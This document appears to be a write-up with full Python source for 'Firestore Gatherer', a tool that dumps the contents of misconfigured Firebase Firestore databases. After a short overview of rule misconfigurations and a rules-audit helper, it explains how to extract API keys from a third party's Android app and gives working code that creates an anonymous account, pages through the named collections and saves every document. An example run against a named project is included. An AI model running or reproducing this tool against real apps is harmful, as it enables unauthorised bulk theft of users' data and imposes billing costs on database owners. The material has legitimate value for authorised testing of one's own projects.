Firestore Gatherer - Dump of an unprotected Firestore database

Introduction

Firebase Firestore is a NoSQL cloud database provided by Google as part of the Firebase platform. It lets developers store, synchronize and query data in real time for web, mobile and server applications. Data is organized into individual documents, which are grouped into collections. Each document is a JSON-like structure of key-value pairs.
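To make the document model concrete, the sketch below shows roughly what a document looks like when it comes back from the Firestore REST API, where every value is wrapped in an object naming its type, and how it can be flattened into plain key-value pairs. The document contents and the flatten helper are made up for illustration and only cover scalar types.

```python
# Illustrative only: a made-up document in the shape the Firestore REST API returns.
rest_document = {
    "name": "projects/example-project/databases/(default)/documents/users/alice",
    "fields": {
        "displayName": {"stringValue": "Alice"},
        "age": {"integerValue": "30"},  # integers arrive as strings
        "verified": {"booleanValue": True},
    },
}


def flatten(doc):
    """Hypothetical helper: unwrap scalar typed values into a plain dict."""
    plain = {}
    for field_name, typed_value in doc.get("fields", {}).items():
        # Each typed value is a one-entry mapping: {"<type>Value": <value>}
        (field_type, value), = typed_value.items()
        plain[field_name] = int(value) if field_type == "integerValue" else value
    return plain


print(flatten(rest_document))
```

Nested maps and arrays need a recursive version of the same idea.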

A project that uses Firebase Firestore can leave its data exposed in several ways. The main points to consider are:

Misconfigured security rules: Firestore lets developers define security rules that control who can read and write to the database. If these rules are not configured correctly, unauthorized parties can access the database.
Lack of user access control: If user authentication and authorization are not implemented properly, unauthorized users may be able to access sensitive data in Firestore.
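As a rough way to spot both problems in your own project, the sketch below scans the text of a security rules file for two conditions that are commonly over-permissive: one that is always true, and one that only requires a signed-in user (which an anonymous account also satisfies when anonymous sign-in is enabled). The regular expressions, the audit_rules helper and the sample rules are assumptions made for illustration; a line-based pattern match is no substitute for reviewing the rules properly.

```python
import re

# Assumed patterns for two commonly over-permissive rule conditions.
OPEN_RULE = re.compile(r"allow\s+[\w,\s]+:\s*if\s+true\s*;")
AUTH_ONLY_RULE = re.compile(r"allow\s+[\w,\s]+:\s*if\s+request\.auth\s*!=\s*null\s*;")


def audit_rules(rules_text):
    """Hypothetical helper: return (line number, problem) pairs for suspicious rules."""
    findings = []
    for line_no, line in enumerate(rules_text.splitlines(), start=1):
        if OPEN_RULE.search(line):
            findings.append((line_no, "open to everyone"))
        elif AUTH_ONLY_RULE.search(line):
            findings.append((line_no, "open to any signed-in user, including anonymous accounts"))
    return findings


# Made-up rules file used only to exercise the helper.
sample_rules = """\
rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    match /public/{doc} {
      allow read, write: if true;
    }
    match /users/{userId} {
      allow read: if request.auth != null;
    }
  }
}
"""

for line_no, problem in audit_rules(sample_rules):
    print(f"line {line_no}: {problem}")
```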

To exploit these weaknesses, a Python tool has been developed. Given a few parameters that can be obtained from the original application that uses the database, it creates an anonymous user account and saves a copy of the database to a file in JSON format.

Use of Firestore Gatherer

To use the program, we first need to define two variables in a JSON configuration file: apiKey and projectId. For an Android application, these can be obtained by unpacking it and looking at the res/values/strings.xml file. The resulting configuration file looks like this:

{
    "apiKey": "Value of the google_api_key variable",
    "projectId": "Value of the project_id variable"
}
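The mapping from strings.xml to the configuration file can be sketched as follows. This assumes the file has already been decoded to plain XML; the sample XML, its values and the build_config helper are made up for illustration, and only the google_api_key and project_id resource names come from the text above.

```python
import json
import xml.etree.ElementTree as ET

# Made-up sample of a decoded res/values/strings.xml; real files hold many more entries.
SAMPLE_STRINGS_XML = """<resources>
    <string name="app_name">Example</string>
    <string name="google_api_key">EXAMPLE_API_KEY</string>
    <string name="project_id">example-project</string>
</resources>
"""


def build_config(strings_xml):
    """Hypothetical helper: map the two string resources onto the config keys."""
    root = ET.fromstring(strings_xml)
    strings = {node.get("name"): (node.text or "") for node in root.iter("string")}
    return {
        "apiKey": strings["google_api_key"],
        "projectId": strings["project_id"],
    }


print(json.dumps(build_config(SAMPLE_STRINGS_XML), indent=4))
```

A KeyError from build_config means one of the two resources is missing from the file.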

The parameters are the following:

-f: The JSON configuration file.
-c: The collections to retrieve from the database, separated by commas, for example collection1,collection2.
-t: Save the creation and modification dates of each document.
-a: By default the program only downloads the first page of documents from each collection. If this parameter is specified, all pages are downloaded. WARNING: THIS MAY CONSUME THE DATABASE QUOTA AND RESULT IN EXTRA BILLING.
-o: The output file where the database will be stored.
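The difference between the default behaviour and -a comes down to whether the download loop follows the page token returned with each response. The sketch below shows that loop in isolation, with the network call replaced by a lookup in a made-up dictionary; fetch_all_pages, FAKE_PAGES and the page contents are hypothetical, while the documents and nextPageToken keys mirror the ones the tool reads.

```python
def fetch_all_pages(fetch_page, retrieve_all=False):
    """Collect documents page by page; fetch_page(token) returns one response dict."""
    documents = []
    page_token = None
    while True:
        response = fetch_page(page_token)
        documents.extend(response.get("documents", []))
        page_token = response.get("nextPageToken")
        # Stop after the first page unless all pages were requested.
        if not page_token or not retrieve_all:
            break
    return documents


# Stand-in for the network call: three fake pages keyed by page token.
FAKE_PAGES = {
    None: {"documents": ["doc1", "doc2"], "nextPageToken": "p2"},
    "p2": {"documents": ["doc3", "doc4"], "nextPageToken": "p3"},
    "p3": {"documents": ["doc5"]},
}

print(len(fetch_all_pages(FAKE_PAGES.get)))                     # first page only
print(len(fetch_all_pages(FAKE_PAGES.get, retrieve_all=True)))  # every page
```

Every extra page is another billed request against the target project, which is why following the token is opt-in.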

This is an example run:

$ firebase_gatherer.py -f firebase_cfg.json -c collection1,collection2,collection3 -o firebase_db.json
Welcome to Firebase Gatherer. Gathering ['collection1', 'collection2', 'collection3'] collections from red-alloy-245217 project.
WARNING:root:From collection collection1 fetched 3 records
WARNING:root:From collection collection2 fetched 3 records
WARNING:root:From collection collection3 fetched 25 records
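The output file holds a list of collections, each with its name and its documents. A quick way to check a dump is to count the documents per collection, as in the sketch below. The summarize helper and the sample data are made up for illustration; the name, documents and id keys follow the layout the tool writes.

```python
import json


def summarize(dump):
    """Hypothetical helper: count documents per collection in a loaded dump."""
    return {collection["name"]: len(collection["documents"]) for collection in dump}


# Made-up data in the same layout as the output file: a list of collections.
sample_dump = json.loads("""
[
    {
        "name": "collection1",
        "documents": [
            {"id": "projects/example-project/databases/(default)/documents/collection1/a", "title": "first"}
        ]
    },
    {"name": "collection2", "documents": []}
]
""")

print(summarize(sample_dump))
```

For a real dump, load the file passed to -o with json.load and hand the result to summarize.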

Source code

import argparse
import json
import logging
import os
import requests

FIREBASE_DOCUMENTS_ENDPOINT = 'https://firestore.googleapis.com/v1/projects/{0}/databases/(default)/documents/{1}'
GOOGLE_IDENTITY_ENDPOINT = 'https://www.googleapis.com/identitytoolkit/v3/relyingparty/signupNewUser'

firestore_rest_errors = {
    'ABORTED': 'The request conflicted with another request.',
    'ALREADY_EXISTS': 'The request tried to create a document that already exists.',
    'DEADLINE_EXCEEDED': 'The Cloud Firestore server handling the request exceeded a deadline.',
    'FAILED_PRECONDITION': 'The request did not meet one of its preconditions. For example, a query request might require an index not yet defined. See the message field in the error response for the precondition that failed.',
    'INTERNAL': 'The Cloud Firestore server returned an error.',
    'INVALID_ARGUMENT': 'A request parameter includes an invalid value. See the message field in the error response for the invalid value.',
    'NOT_FOUND': 'The request attempted to update a document that does not exist.',
    'PERMISSION_DENIED': 'The user is not authorized to make this request.',
    'RESOURCE_EXHAUSTED': 'The project exceeded either its quota or the region/multi-region capacity.',
    'UNAUTHENTICATED': 'The request did not include valid authentication credentials.',
    'UNAVAILABLE': 'The Cloud Firestore server returned an error.'    
}

# To route the traffic through a local intercepting proxy, use instead:
# proxy_dict = {
#     'http': 'http://127.0.0.1:8888',
#     'https': 'http://127.0.0.1:8888',
# }
proxy_dict = {}

def get_document_field(field_type, value):
    """Convert one typed Firestore REST value into a plain Python value."""
    field = None
    # Scalar types are stored as-is (bytesValue stays a base64 string)
    if field_type in ['stringValue', 'doubleValue', 'booleanValue', 'nullValue', 'timestampValue', 'referenceValue', 'bytesValue']:
        field = value
    elif field_type == 'integerValue':
        # Integers are serialized as strings in the REST API
        field = int(value)
    elif field_type == 'mapValue':
        field = get_document_fields(value, {}, False)
    elif field_type == 'arrayValue':
        field = []
        # Empty arrays come back without a 'values' key
        for item in value.get('values', []):
            for item_type, item_value in item.items():
                field.append(get_document_field(item_type, item_value))
    elif field_type == 'geoPointValue':
        field = str(value['latitude']) + ', ' + str(value['longitude'])
    return field

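def get_document_fields(doc, document, timestamp):
    """Copy the fields of a REST document (or map value) into the plain dict `document`."""
    # Documents and maps without fields omit the 'fields' key
    for field_name, field_value in doc.get('fields', {}).items():
        for field_type, value in field_value.items():
            document[field_name] = get_document_field(field_type, value)
    # The timestamps live on the REST document, not on the flattened copy
    if timestamp and 'createTime' in doc and 'updateTime' in doc:
        document['create_time'] = doc['createTime']
        document['update_time'] = doc['updateTime']
    return document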

def get_firestore_collection(collection_name, timestamp, retrieve_all_pages):
    documents = []
    next_page_token = None
    # Arbitrary limit so a permanent error (e.g. PERMISSION_DENIED) does not retry forever
    retries_left = 3
    url = FIREBASE_DOCUMENTS_ENDPOINT.format(firebaseConfig['projectId'], collection_name)
    while True:
        headers = {
            'Authorization': 'Firebase ' + firebaseConfig['tokenId']
        }
        params_dict = {}
        if next_page_token is not None:
            params_dict['pageToken'] = next_page_token
        req = requests.get(url, headers=headers, params=params_dict, proxies=proxy_dict)
        req_json = req.json()
        if req.status_code != 200:
            # Fall back to the raw status when it is missing from the table above
            status = req_json.get('error', {}).get('status', 'UNKNOWN')
            message = firestore_rest_errors.get(status, status)
            if retries_left == 0:
                logging.error(message + ' Giving up on collection ' + collection_name)
                break
            retries_left -= 1
            logging.error(message + ' Retrying...')
            # The token may have expired: request a new one before retrying
            generate_anon_token()
            continue

        if 'documents' in req_json:
            for doc in req_json['documents']:
                document = {}
                document['id'] = doc['name']
                document = get_document_fields(doc, document, timestamp)
                documents.append(document)

        logging.warning('From collection ' + collection_name + ' fetched ' + str(len(documents)) + ' records')

        # Follow the page token only when all pages were requested
        if 'nextPageToken' in req_json and retrieve_all_pages:
            next_page_token = req_json['nextPageToken']
        else:
            break
    return documents

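def generate_anon_token():
    params_dict = {
        'key': firebaseConfig['apiKey']
    }
    # A sign-up request without email or password creates an anonymous account
    req = requests.post(GOOGLE_IDENTITY_ENDPOINT, params=params_dict, json={'returnSecureToken': True}, proxies=proxy_dict)
    json_response = req.json()
    if 'idToken' not in json_response:
        # Typically means anonymous sign-in is disabled or the API key is wrong
        logging.error('Could not create an anonymous account: ' + str(json_response.get('error', json_response)))
        raise SystemExit(1)
    firebaseConfig['tokenId'] = json_response['idToken']
    # Cache the token in the configuration file so later runs can reuse it
    with open(filename, 'w') as config_file:
        json.dump(firebaseConfig, config_file, indent=4)
    logging.warning('Generated new token id: ' + firebaseConfig['tokenId'][:8] + '...')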

def get_arguments():
    parser = argparse.ArgumentParser(prog='Firestore Gatherer', description='Gather the contents of an unprotected Firestore Database.')
    parser.add_argument('-f', '--config-file', help='File containing the Firestore configuration', required=True)
    parser.add_argument('-c', '--collections', help='Names of the collections, separated by commas. Example: collection1,collection2', required=True)
    parser.add_argument('-t', '--timestamp', help='Save the timestamp for every document.', action=argparse.BooleanOptionalAction, default=False)
    parser.add_argument('-a', '--retrieve-all', help='By default the program only fetches the first page of every collection. With this flag, it will retrieve all pages. WARNING: THIS CAN CONSUME THE DATABASE QUOTA AND INCUR EXTRA BILLING!!!', action=argparse.BooleanOptionalAction, default=False)
    parser.add_argument('-o', '--output-file', help='File to save the database.', required=True)
    return parser.parse_args()

# Load configuration from file
args = get_arguments()
filename = args.config_file
if not os.path.exists(filename):
    logging.error('The specified filename does not exist')
    exit(-1)
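try:
    with open(filename) as config_file:
        firebaseConfig = json.load(config_file)
    if not isinstance(firebaseConfig, dict):
        raise ValueError('configuration must be a JSON object')
    # all fields ['apiKey', 'authDomain', 'databaseURL', 'projectId', 'storageBucket', 'messagingSenderId', 'appId', 'tokenId']
    # Only these keys are accepted; apiKey and projectId are mandatory
    if set(firebaseConfig) - {'apiKey', 'projectId', 'tokenId'}:
        raise ValueError('unexpected key')
    if not {'apiKey', 'projectId'} <= set(firebaseConfig):
        raise ValueError('missing key')
except (OSError, ValueError):
    logging.error('The loaded file is invalid')
    exit(-1)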

# Generate token
if 'tokenId' not in firebaseConfig:
    generate_anon_token()

# Collection argument: split on commas and drop empty names
collections = [name.strip() for name in args.collections.split(',') if name.strip()]
if not collections:
    logging.error('Invalid collections specified')
    exit(-1)

# Other arguments
timestamp = args.timestamp
output_file = args.output_file
retrieve_all = args.retrieve_all

print('Welcome to Firebase Gatherer. Gathering ' + str(collections) + ' collections from ' + firebaseConfig['projectId'] + ' project.')

lib = []
for collection in collections:
    col = {}
    col['name'] = collection
    col['documents'] = get_firestore_collection(collection, timestamp, retrieve_all)
    lib.append(col)

# Write the gathered collections to the output file
with open(output_file, 'w') as out_file:
    json.dump(lib, out_file, indent=4)